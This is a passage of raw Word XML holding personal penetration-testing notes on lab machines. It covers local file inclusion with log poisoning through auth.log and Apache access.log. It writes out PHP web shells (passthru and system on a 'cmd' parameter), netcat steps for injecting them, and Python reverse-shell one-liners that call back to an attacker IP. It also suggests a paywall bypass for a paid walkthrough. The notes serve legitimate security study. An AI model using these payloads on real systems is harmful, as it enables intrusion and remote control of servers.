        <w:t xml:space="preserve">"sinner" is the fake username being used for SSH, but it can be anything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The code snippet </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php passthru($_GET['cmd']); ?&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is written in PHP and is performing the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Receiving Input: It takes a parameter named cmd from the URL query string. For example, if the URL is http://example.com/script.php?cmd=ls, the value of cmd would be ls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executing Command: The passthru() function in PHP executes the command passed to it as an argument. In this case, the command is the value of $_GET['cmd'].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outputting Result: The passthru() function sends the output of the executed command directly to the browser. This means that the result of the command will be displayed as part of the web page.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1905000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="579" name="image561.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image561.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId579"/>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1D18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now going back to the vulnerable URL endpoint we can see the injection showing in the logs and test it by passing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D1B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.167.80/console/file.php?file=/var/log/auth.log&amp;cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1193800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="97" name="image98.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image98.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId580"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1193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D1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since I was able to verify my PHP injection worked I aimed to get a reverse shell using Python. I first made sure I set a netcat listener on my attacker machine and ran the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D21">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://192.168.167.80/console/file.php?file=/var/log/auth.log&amp;cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.45.204%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D2B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r1ona1s0h72m" w:id="242"/>
      <w:bookmarkEnd w:id="242"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting access.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D2D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId581">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Solstice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the paid walkthrough </w:t>
      </w:r>
      <w:hyperlink r:id="rId582">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but just use freedium to get it for free) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we had LFI, and we tried doing Log Poisoning. We first looked at the access.log file, which is inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache2/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D2F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit, do below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -0.10.10.10 80 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nv 10.10.10.10 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This connects you to port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second command has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-nv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"No DNS resolution" and "verbose"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside of the netcat connection, copy and paste this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET &lt;?php system($_GET['cmd']);?&gt; HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now look at the access.log again, and if you don't see any PHP mentions at the end of the log file, then that means the PHP code probably got executed instead of being taken literally as a string and put into the logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can try and run some commands via this PHP injection. First we should see if Python is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.43.234:8593/index.php?book=../../../../../var/log/apache2/access.log&amp;cmd=which+python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "+" is URL encode for a space, so you can try a "+" or a space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now look at access.log and if you see a path to a python3 file in the end, then you have python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can use a python3 reverse shell one liner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.43.234:8593/index.php?book=../../../../../var/log/apache2/access.log&amp;cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",attackerport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the writeup, they used BurpSuite and URL encoded </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
